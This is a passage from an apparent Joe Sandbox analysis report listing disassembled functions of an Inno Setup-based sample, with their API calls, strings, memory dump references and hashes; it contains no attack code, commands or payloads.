                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Enum$NameOpenResourceUniversal
                                                                                                                                                                                                                                  • String ID: Z
                                                                                                                                                                                                                                  • API String ID: 3604996873-1505515367
                                                                                                                                                                                                                                  • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                                                                                                                                                                  • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0044CFC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                                                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                                                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DrawText$EmptyRect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 182455014-2867612384
                                                                                                                                                                                                                                  • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                                                                                                                                                                  • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042EF74 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                                                                                                                                                                    • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                                                                                                                                                                  • String ID: ...\
                                                                                                                                                                                                                                  • API String ID: 3133960002-983595016
                                                                                                                                                                                                                                  • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                                                                                                                                                                  • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                                                                                                                                                  • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                                                                                                                                                  • RegisterClassA.USER32(?), ref: 004164CE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Class$InfoRegisterUnregister
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 3749476976-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                                                                                                                                                                  • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00498210 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                                                                                                                                                                                                  • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Attributes$Move
                                                                                                                                                                                                                                  • String ID: isRS-%.3u.tmp
                                                                                                                                                                                                                                  • API String ID: 3839737484-3657609586
                                                                                                                                                                                                                                  • Opcode ID: 1f4ba81bd314e92a31c307d6850739873bb922dca52444ea26c7a0748bf5c42b
                                                                                                                                                                                                                                  • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f4ba81bd314e92a31c307d6850739873bb922dca52444ea26c7a0748bf5c42b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExitMessageProcess
                                                                                                                                                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                                  • API String ID: 1220098344-2970929446
                                                                                                                                                                                                                                  • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                                                                                                                                                  • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00456BFC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                                                                                                                                                    • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                                                                                                    • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                                                                                                  • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                                                                                                                                                                  • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                                                                                                                                                                  • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                                                                                                                                                  • API String ID: 1312246647-2435364021
                                                                                                                                                                                                                                  • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                                                                                                                                                                  • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00457154 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                                                                                                                                                                  • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                  • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                                                                                                                                                  • API String ID: 3850602802-3720027226
                                                                                                                                                                                                                                  • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                                                                                                                                                  • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004786EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 00478757
                                                                                                                                                                                                                                  • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                                                                                                                                                                  • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FocusMessageStateTextWaitWindow
                                                                                                                                                                                                                                  • String ID: Wnd=$%x
                                                                                                                                                                                                                                  • API String ID: 1381870634-2927251529
                                                                                                                                                                                                                                  • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                                                                                                                                                  • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046E610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Time$File$LocalSystem
                                                                                                                                                                                                                                  • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                                                                                                                                                  • API String ID: 1748579591-1013271723
                                                                                                                                                                                                                                  • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                                                                                                                                                                  • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00453F76 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                                                                                                                                                                    • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                                                                                                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                                                                                                                                                                    • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$AttributesDeleteErrorLastMove
                                                                                                                                                                                                                                  • String ID: DeleteFile$MoveFile
                                                                                                                                                                                                                                  • API String ID: 3024442154-139070271
                                                                                                                                                                                                                                  • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                                                                                                                                                                  • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00459364 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                  • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                                                                                                                                                                  • API String ID: 47109696-2631785700
                                                                                                                                                                                                                                  • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                                                                                                                                                                  • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
